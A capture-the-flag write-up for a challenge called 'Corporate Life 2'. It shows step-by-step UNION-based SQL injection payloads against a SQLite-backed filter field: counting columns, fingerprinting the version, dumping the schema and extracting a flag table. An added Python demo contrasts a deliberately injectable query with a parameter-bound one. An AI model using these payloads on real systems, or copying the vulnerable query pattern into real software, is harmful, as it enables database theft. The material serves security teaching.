KashiCTF

Corporate Life 2 [261 pts]

 Challenge Description
Points: 261
Solves: 117
  • union SQLi to retrieve hidden table name, columns and finally contents

This challenge has the same setup as the previous one (Corporate Life 1); we just have to find the flag elsewhere, since ' OR 1=1 -- still works but the flag is not there. Let's try a UNION injection. The first step is figuring out how many fields are returned by the original query, because a UNION only works when both SELECTs return the same number of columns. Since the table lists 6 elements per user, let's return 6 nulls:

{
	"filter":"' union select null, null, null, null, null, null  --"
}

It works fine. Next we need to find out which database this is. I tried enumerating the version, and the payload for SQLite worked:

{
	"filter":"' union select sqlite_version(), null, null, null, null, null --"
}

Now we would like to enumerate which tables are in the database. We can use group_concat for that purpose; applied to the sql column of sqlite_schema, which holds each table's CREATE statement, it shows the tables as well as their columns:

{
	"filter":"' union select group_concat(sql, ' | '), null, null, null, null, null from sqlite_schema --"
}

There is a flags table with a column secret_flag, so let's get the flag by selecting that column from the flags table:

{
	"filter":"' union select group_concat(secret_flag, ' | '), null, null, null, null, null from flags --"
}

which returns a new entry with the flag KashiCTF{b0r1ng_old_c0rp0_l1f3_am_1_r1gh7_elzjMs6d}
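
Why the filter is injectable and how parameter binding closes it, as an added example that is not part of the original writeup or the challenge's source. The requests table, its column names, the WHERE clause and the placeholder secret are assumptions constructed for the demo; only the flags table, its secret_flag column and the filter payloads come from the writeup.

```python
import sqlite3

COLUMNS = "id, employee, department, role, request, status"

def make_db():
    """Constructed stand-in for the challenge database (schema is assumed)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE requests (id INTEGER, employee TEXT, department TEXT,
                               role TEXT, request TEXT, status TEXT);
        INSERT INTO requests VALUES (1, 'alice', 'IT', 'admin', 'vpn access', 'approved');
        INSERT INTO requests VALUES (2, 'bob', 'HR', 'clerk', 'new badge', 'denied');
        CREATE TABLE flags (secret_flag TEXT);
        INSERT INTO flags VALUES ('PLACEHOLDER{constructed_secret}');
    """)
    return conn

def search_vulnerable(conn, filter_value):
    # The filter is spliced into the SQL text, so a quote inside it ends the
    # string literal and everything after it is parsed as SQL.
    query = f"SELECT {COLUMNS} FROM requests WHERE department = '{filter_value}'"
    return conn.execute(query).fetchall()

def search_safe(conn, filter_value):
    # The filter is bound as a parameter: SQLite compiles the statement first
    # and only ever compares the value as data, whatever characters it holds.
    query = f"SELECT {COLUMNS} FROM requests WHERE department = ?"
    return conn.execute(query, (filter_value,)).fetchall()

# Filter values as used in the writeup.
TAUTOLOGY = "' OR 1=1 --"
UNION_FLAG = ("' union select group_concat(secret_flag, ' | '), "
              "null, null, null, null, null from flags --")

if __name__ == "__main__":
    db = make_db()
    for name, value in [("normal", "HR"), ("tautology", TAUTOLOGY), ("union", UNION_FLAG)]:
        print(f"{name:9} vulnerable: {search_vulnerable(db, value)}")
        print(f"{name:9} safe:       {search_safe(db, value)}")
```

With binding in place, both payloads are treated as a department name that matches no row, while the legitimate filter returns the same result from either function.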